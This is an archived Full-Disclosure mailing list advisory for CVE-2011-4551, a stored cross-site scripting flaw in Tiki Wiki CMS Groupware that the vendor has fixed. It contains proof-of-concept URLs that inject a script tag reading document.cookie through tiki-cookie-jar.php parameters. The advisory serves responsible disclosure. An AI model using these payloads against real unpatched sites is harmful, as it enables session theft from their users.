| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 20 Dec 2011 14:38:03 +0000
From: "Schurtz, Stefan" <S.Schurtz@...oserve.de>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Tiki Wiki CMS Groupware Stored
Cross-Site-Scripting
Advisory: Tiki Wiki CMS Groupware Stored Cross-Site-Scripting
Advisory ID: INFOSERVE-ADV2011-07
Author: Stefan Schurtz
Contact: security@...oserve.de
Affected Software: Successfully tested on Tiki 8.1 & 6.4 LTS (affects all
current releases)
Vendor URL: http://info.tiki.org/
Vendor Status: fixed
CVE-ID:CVE-2011-4551
==========================
Vulnerability Description
==========================
All current releases of Tiki Wiki are prone to a stored XSS vulnerability
==================
PoC-Exploit
==================
Tested with Firefox 7.01
Visit this URL
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss=</style></scr
ipt><script>alert(document.cookie)</script> -> blank site
But when you visit one of this pages, the XSS will be executed
http://<target>/tiki-8.1/tiki-login.php
http://<target>/tiki-8.1/tiki-remind_password.php
// browser source code
show_errors: 'y',
xss:
'</style></script><script>alert(document.cookie)</script>'
};
Another example:
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss1=</style></sc
ript><script>alert(document.cookie)</script>
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss2=</style></sc
ript><script>alert(document.cookie)</script>
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss3=</style></sc
ript><script>alert(document.cookie)</script>
All of them will be executed!
// browser source code
show_errors: 'y',
xss1: '</style></script><script>alert(document.cookie)</script>',
xss2: '</style></script><script>alert(document.cookie)</script>',
xss3: '</style></script><script>alert(document.cookie)</script>'
};
=========
Solution
=========
Upgrade to Tiki 8.2 or 6.5 LTS
====================
Disclosure Timeline
====================
16-Nov-2011 - informed Security Team (security@...iwiki.org)
19-Dec-2011 - fixed by vendor
========
Credits
========
Vulnerabilitiy found and advisory written by the INFOSERVE security team.
===========
References
===========
http://info.tiki.org/article183-Tiki-Wiki-CMS-Groupware-8-2-and-6-5LTS-Secur
ity-Patches-Available
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-07.txt
Best regards,
Stefan Schurtz | SECURE INFRASTRUCTURE
INFOSERVE GmbH | Am Felsbrunnen 15 | D-66119 Saarbrücken
Fon +49 (0)681 88008-52 | Fax +49 (0)681 88008-33 |
s.schurtz@...oserve.de | www.infoserve.de
Handelsregister: Amtsgericht Saarbrücken, HRB 11001 | Erfüllungsort:
Saarbrücken
Geschäftsführer: Dr. Stefan Leinenbach | Ust-IdNr.: DE168970599
Download attachment "smime.p7s" of type "application/x-pkcs7-signature" (7511 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists